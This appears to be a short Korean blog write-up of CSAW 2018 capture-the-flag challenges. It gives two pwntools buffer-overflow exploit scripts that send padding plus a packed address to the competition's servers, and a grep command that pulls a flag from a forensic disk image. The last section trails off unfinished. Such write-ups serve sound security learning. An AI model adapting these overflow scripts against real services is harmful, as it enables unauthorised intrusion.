Write-up
[CSAW 2018] writeup
ch4rli3kop
2018. 9. 21. 19:27
반응형
매우매우 간단한 문제들쓰
system
bigboy
매우매우 간단한 bof 문제
/*exploit code*/
from pwn import *
r = remote('pwn.chal.csaw.io' ,9000)
#r = process("./boi")
context.log_level = 'debug'
r.recvline()
a = "A" * 0x14
a += p64(0xcaf3baee)
r.sendline(a)
r.interactive()
get it?
여윽시 매우매우 간단한 bof
/*exploit code*/
from pwn import *
#r = process("./get_it")
r = remote("pwn.chal.csaw.io", 9001)
context.log_level = 'debug'
r.recvline()
a = "A" * 0x28
a += p64(0x004005B6)
r.send(a)
r.interactive()
Forensic
rewind
문제 설명은 다음과 같다.
문제 파일을 다운로드 받아 file 명령어로 살펴보면, 다음과 같이 data 와 QEMU disk image 파일인 것을 확인할 수 있다.
> strings rewind-rr-snp | grep "flag{"
혹은
> grep -a "flag{.*}" rewind-rr-snp
명령어로 박혀있는 플래그를 읽어올 수 있다.
image 파일에 보통 flag가 하드코딩되어 있는 경우가 있긴하던데 이 문제도 그럴줄은 몰랐다..
simple_recovery
주어진 파일 속에 존재하는 disk.img0 는...
...음
반응형